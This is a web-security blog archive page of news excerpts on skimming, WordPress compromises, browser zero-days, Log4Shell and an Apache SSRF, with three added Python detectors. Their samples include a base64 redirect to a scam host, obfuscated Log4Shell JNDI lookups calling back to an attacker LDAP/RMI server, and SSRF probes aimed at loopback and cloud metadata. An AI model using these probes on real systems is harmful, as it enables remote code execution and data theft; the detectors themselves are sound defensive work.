Archive for the ‘Web Security’ Category

Microsoft warns of new highly evasive web skimming campaigns

Threat actors behind web skimming campaigns are using malicious JavaScript to mimic Google Analytics and Meta Pixel scripts to avoid detection. Microsoft security researchers recently observed web skimming campaigns that used multiple obfuscation techniques to avoid detection. The threat actors obfuscated the skimming script by encoding it in PHP, which, in turn, was embedded in […]

Massive hacking campaign compromised thousands of WordPress websites

Cybersecurity researchers from Sucuri uncovered a massive campaign that compromised thousands of WordPress websites by injecting malicious JavaScript that redirects visitors to scam sites. The infections automatically redirect site visitors to third-party websites containing malicious content […]
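
The skimming campaign above and this redirect campaign share a detection angle: a skimmer that imitates a Google Analytics or Meta Pixel loader, and an injected redirect that hides its destination in an encoded string, both surface as scripts that either load from a host the real vendors never use or carry decode-and-navigate logic. The scanner below is an added example written for this page, not code from Microsoft, Sucuri or the original posts. The page it audits is a constructed sample, and the set of legitimate analytics hosts, the brand words and the inline-script traits are assumptions to tune for your own site; it goes a little beyond the two posts by also decoding base64 blobs in inline scripts to recover the hidden URL.

```python
import base64
import binascii
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts the genuine Google Analytics / gtag.js and Meta Pixel loaders are served from (assumed list).
KNOWN_ANALYTICS_HOSTS = {
    "www.google-analytics.com",
    "www.googletagmanager.com",
    "connect.facebook.net",
}
# Brand words a lookalike loader borrows to blend in with real analytics tags.
_BRAND_WORDS = ("google", "analytics", "gtag", "facebook", "fbevents", "pixel")
# Inline-script traits shared by skimmers and redirect injections (assumed, tune for your site).
_INLINE_TRAITS = [
    ("base64 decode call", re.compile(r"\batob\s*\(")),
    ("char-code assembled string", re.compile(r"String\.fromCharCode")),
    ("dynamic code evaluation", re.compile(r"\beval\s*\(|new\s+Function\s*\(")),
    ("forced navigation", re.compile(r"location(?:\.href|\.replace|\.assign)?\s*[=(]")),
]
_B64_BLOB = re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")
_URL = re.compile(r"""https?://[^\s'"]+""")

# Constructed sample page: a real gtag loader and snippet, then a lookalike
# loader on an unrelated CDN and an inline redirect whose target is base64.
SAMPLE_HTML = """<html><head>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-XXXXXXX"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date()); gtag('config', 'G-XXXXXXX');
</script>
<script src="https://cdn.example.net/static/google-analytics.js"></script>
<script>
  var u = atob('aHR0cHM6Ly9zY2FtLmV4YW1wbGUvbGFuZGluZw==');
  if (document.referrer.indexOf('google') > -1) { window.location.href = u; }
</script>
</head><body><p>Shop</p></body></html>"""


class _ScriptCollector(HTMLParser):
    """Collect external script URLs and inline script bodies from a page."""

    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_inline, self._buf = False, []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline, self._buf = True, []

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_inline:
            self.inline.append("".join(self._buf))
            self._in_inline = False


def _decoded_urls(script):
    """Base64-decode long blobs in a script and return any URLs hidden inside them."""
    urls = []
    for blob in _B64_BLOB.findall(script):
        try:
            text = base64.b64decode(blob, validate=True).decode("utf-8", "ignore")
        except (binascii.Error, ValueError):
            continue
        urls.extend(_URL.findall(text))
    return urls


def audit_page(html):
    """Return (kind, detail) findings for scripts that mimic analytics or hide redirects."""
    parser = _ScriptCollector()
    parser.feed(html)
    findings = []
    for src in parser.external:
        host = (urlparse(src).hostname or "").lower()
        if host in KNOWN_ANALYTICS_HOSTS:
            continue  # the real loader from its real host
        # Analytics brand words on any other host (or self-hosted) are the disguise to look for.
        if any(word in src.lower() for word in _BRAND_WORDS):
            findings.append(("lookalike analytics loader", src))
    for n, body in enumerate(parser.inline, 1):
        for label, pattern in _INLINE_TRAITS:
            if pattern.search(body):
                findings.append((label, f"inline script #{n}"))
        for url in _decoded_urls(body):
            findings.append(("base64-hidden URL", url))
    return findings


if __name__ == "__main__":
    for kind, detail in audit_page(SAMPLE_HTML):
        print(f"{kind}: {detail}")
```

A finding is a lead, not a verdict: a self-hosted copy of a file named like the vendor script may be a legitimate tag-manager export, so diff the flagged file against the vendor's published script before cleaning, and extend `KNOWN_ANALYTICS_HOSTS` with every analytics host your site actually uses.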

Keep your digital banking safe: Tips for consumers and banks

Digital banking has been a reality for quite a while now, and the last few years have pushed it forward even faster. Is security keeping pace? Online banking and mobile banking apps have made great security strides in recent years. In fact, some of today’s most well-respected banks are improving security measures by offering SMS or […]

Burp Suite overview

Burp Suite is a proxy-based tool developed by PortSwigger for evaluating the security of web applications and performing hands-on testing. It is one of the most popular penetration testing and vulnerability discovery tools and is often used to check web application security.

Compromised WordPress sites launch DDoS on Ukrainian websites

Threat actors compromised WordPress sites to deploy a script that launches DDoS attacks on Ukrainian websites whenever the compromised pages are visited. MalwareHunterTeam researchers discovered the malicious script on a compromised WordPress site; when users visited the site, the script launched a DDoS attack against ten Ukrainian sites. The JavaScript was designed […]

Chrome emergency update fixes actively exploited zero-day bug

Google has released Chrome 99.0.4844.84 for Windows, Mac, and Linux to address an actively exploited high-severity zero-day bug, tracked […]

Firefox patches two in-the-wild exploits – update now!

Mozilla has published Firefox 97.0.2, an “out-of-band” update that closes two bugs that are officially listed as critical. Mozilla reports that both of these holes are already actively being exploited, making them so-called zero-day bugs, which means, in simple terms, that the crooks got there first: We have had reports of attacks in the wild abusing [these] […]

OWASP Testing Guide

Owasp-testing-guide-4.0 (download)

OWASP Vulnerability Management Guide

High-Severity flaw in 3 WordPress plugins impacts 84,000 websites

Researchers from WordPress security company Wordfence discovered a high-severity vulnerability that affects three different WordPress plugins that impact over 84,000 websites. The vulnerability tracked as CVE-2022-0215 is a cross-site request forgery (CSRF) issue that received a CVSS score of 8.8. A threat actor could exploit the vulnerability to take over vulnerable websites. The flaw impacts three plugins […]

All in One SEO Plugin Bug Threatens 3M Websites with Takeovers

A critical privilege-escalation vulnerability could let attackers plant backdoors with admin access on web servers. A popular WordPress SEO-optimization plugin, All in One SEO, has a pair of security vulnerabilities that, when combined into an exploit chain, could leave website owners open to site takeover. The plugin is used by more than 3 million websites. An attacker […]

Apache’s other product: Critical bugs in ‘httpd’ web server, patch now!

Pick a random person, and ask them these two questions: Q1. Have you heard of Apache? Q2. If so, can you name an Apache product? We’re willing to wager that you will get one of two replies: A1. No. A2. (Not applicable.) A1. Yes. A2. Log4j. Two weeks ago, however, we’d suggest that very few people had heard of Log4j, and even amongst those cognoscenti, few […]

Google fixed the 17th zero-day in Chrome since the start of the year

Google released security updates to address five vulnerabilities in the Chrome web browser, including a high-severity zero-day flaw, tracked as CVE-2021-4102, exploited in the wild. The CVE-2021-4102 flaw is a use-after-free issue in the V8 JavaScript and WebAssembly engine, its exploitation could lead to the execution of arbitrary code or data corruption. “Google is aware of reports that an exploit for CVE-2021-4102 […]

CISA adds Log4Shell Log4j flaw to the Known Exploited Vulnerabilities Catalog

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 13 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including the recently disclosed Apache Log4Shell (Log4j) and Fortinet FortiOS flaws. […]

Cybereason released Logout4Shell, a vaccine for Log4Shell Apache Log4j RCE

Chinese security researcher p0rz9 publicly disclosed a proof-of-concept exploit for a critical remote code execution zero-day vulnerability, tracked as CVE-2021-44228 (aka Log4Shell), in the Apache Log4j Java-based logging library. Log4j is widely used by both enterprise apps and cloud services, including Apple iCloud and Steam. A remote, unauthenticated attacker can exploit CVE-2021-44228 to execute arbitrary code on a vulnerable system […]
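
A log check for the Log4Shell probes referred to here and in the CISA entry above, as an added example that is not from Cybereason, the Logout4Shell project or the original posts. It recognises the plain `${jndi:…}` lookup and the common obfuscations built from Log4j's own lookup syntax (`${lower:j}`, `${upper:n}`, `${::-j}`, `${env:X:-j}`) by evaluating those the way Log4j 2.x would, after URL-decoding; the access-log lines are constructed samples, and the addresses in them are documentation ranges.

```python
import re
from urllib.parse import unquote

# Innermost ${...} lookup (a body with no nested braces).
_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
# A JNDI lookup once obfuscation is stripped; group 1 is the protocol (ldap, rmi, dns, ...).
_JNDI = re.compile(r"\$\{jndi:([a-z]+):[^}]*\}", re.IGNORECASE)

# Constructed Apache combined-format lines: one clean request, then three probes
# (plain, nested-lookup obfuscated, URL-encoded in the query string).
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Dec/2021:10:00:00 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [10/Dec/2021:10:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7:1389/a}"',
    '203.0.113.9 - - [10/Dec/2021:10:00:03 +0000] "GET /?q=%24%7Bjndi%3Armi%3A%2F%2F198.51.100.7%3A1099%2Fx%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]


def _resolve(match):
    """Evaluate one obfuscating lookup the way Log4j 2.x does; keep everything else as is."""
    body = match.group(1)
    name, sep, arg = body.partition(":")
    if name.lower() == "jndi":
        return match.group(0)            # this is what we are hunting; keep it intact
    if ":-" in body:                     # ${env:NOPE:-j} and ${::-j} both yield "j"
        return body.split(":-", 1)[1]
    if sep and name.lower() == "lower":  # ${lower:J} -> "j"
        return arg.lower()
    if sep and name.lower() == "upper":  # ${upper:n} -> "N"
        return arg.upper()
    return match.group(0)                # unknown lookup: leave untouched


def normalize(text):
    """URL-decode (repeatedly) and collapse nested lookups from the inside out until stable."""
    while (decoded := unquote(text)) != text:
        text = decoded
    # Every substitution removes at least the "${" and "}" wrapper, so this terminates.
    while (collapsed := _LOOKUP.sub(_resolve, text)) != text:
        text = collapsed
    return text


def find_log4shell(lines):
    """Return (line number, protocol, lookup as seen after normalisation) for each JNDI probe."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append((number, match.group(1).lower(), match.group(0)))
    return hits


if __name__ == "__main__":
    for number, proto, lookup in find_log4shell(SAMPLE_LOG):
        print(f"line {number}: {proto} lookup {lookup}")
```

A hit means a probe arrived, not that it fired: the header or parameter has to reach a vulnerable Log4j call on the application side, so pair this with an inventory of which services log client-controlled fields, and treat the host and port inside the lookup as the callback infrastructure to block and hunt for in outbound connection logs.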

Microsoft Vancouver leaking website credentials via overlooked DS_STORE file

The metadata stored on the file led the researchers to several WordPress database dumps, which contained multiple administrator usernames and email addresses, as well as the hashed password for the Microsoft Vancouver website. Security researchers – us at CyberNews included – routinely use search engines that index publicly accessible Internet of Things (IoT) devices and web servers […]

A guide to internet safety for kids

As a resource, the internet is a wonderful place for children to learn, explore ideas, and express themselves creatively. The internet is also key in a child’s social development, helping to strengthen communication skills, for example when playing games or chatting with friends. However, parents should be aware that all these activities often come with […]

Experts warn of attacks exploiting CVE-2021-40438 flaw in Apache HTTP Server

Threat actors are exploiting a recently addressed server-side request forgery (SSRF) vulnerability, tracked as CVE-2021-40438, in Apache HTTP servers. The CVE-2021-40438 flaw can be exploited against httpd web servers that have the mod_proxy module enabled. A threat actor can trigger the issue using a specially crafted request to cause the module to forward the request to an […]
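
Detection logic for the CVE-2021-40438 requests described above, as an added example that is not from the original post or the Apache project. It assumes the crafted request has the shape of the public proof-of-concept requests for this bug: a `unix:` socket path inside the request URI, then a `|` and the URL the attacker wants mod_proxy to forward to. The log lines are constructed samples in Apache combined format, with documentation-range addresses.

```python
import re
from urllib.parse import unquote

# Apache combined-format request line: method, URI, protocol.
_REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<uri>\S+) HTTP/[\d.]+"')
# Shape of the public proof-of-concept URI: a unix: socket path, then | and the real target.
_UDS_SMUGGLE = re.compile(
    r'unix:(?P<sock>[^|]*)\|(?P<target>[a-z][a-z0-9+.-]*://[^\s"]+)', re.IGNORECASE
)

# Constructed log lines: a normal proxied request, then two probes. The socket
# path in the probes is padded with thousands of bytes, as real probes pad it.
SAMPLE_LOG = [
    '198.51.100.4 - - [20/Dec/2021:09:00:00 +0000] "GET /app/status HTTP/1.1" 200 311 "-" "Mozilla/5.0"',
    '203.0.113.77 - - [20/Dec/2021:09:00:05 +0000] "GET /app/?unix:' + "A" * 4200
    + '|http://127.0.0.1:8080/admin HTTP/1.1" 200 2048 "-" "python-requests/2.26"',
    '203.0.113.77 - - [20/Dec/2021:09:00:06 +0000] "GET /app/?unix:' + "A" * 4200
    + '%7Chttp://169.254.169.254/latest/meta-data/ HTTP/1.1" 200 417 "-" "python-requests/2.26"',
]


def find_mod_proxy_ssrf(lines):
    """Return one dict per request whose URI smuggles a proxy target behind a unix: socket path."""
    hits = []
    for number, line in enumerate(lines, 1):
        request = _REQUEST.search(line)
        if not request:
            continue
        uri = unquote(request.group("uri"))  # probes often encode the | as %7C
        match = _UDS_SMUGGLE.search(uri)
        if match:
            hits.append({
                "line": number,
                "socket_path_len": len(match.group("sock")),
                "target": match.group("target"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_mod_proxy_ssrf(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['socket_path_len']}-byte socket path, target {hit['target']}")
```

Any `unix:…|scheme://` in a client-supplied URI is worth an alert regardless of length, since browsers never produce it; the reported length and target tell you whether the probe was padded like the proof of concept and what it was aiming at (the loopback service and the cloud metadata endpoint in the sample are the usual targets of an SSRF of this kind). A 200 status on such a line means the proxied response came back and the host should be treated as exposed until patched.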

There’s More to Threat Intelligence Than Dark Web Monitoring

Dark web monitoring seems to be a hot buzzword in discussions about cyberthreat intelligence (CTI) and how it helps cybersecurity strategy and operations. Indeed, dark web monitoring enables a better understanding of an attacker’s perspective, and following their activities on dark web forums can have a great impact on cybersecurity readiness and posture. Accurate and timely knowledge of […]

DuckDuckGo Wants to Stop Apps From Tracking You on Android

At the end of April, Apple’s introduction of App Tracking Transparency tools shook the advertising industry to its core. iPhone and iPad owners could now stop apps from tracking their behavior and using their data for personalized advertising. Since the new privacy controls launched, almost $10 billion has been wiped from the revenues of Snap, Meta Platforms’ Facebook, Twitter, […]
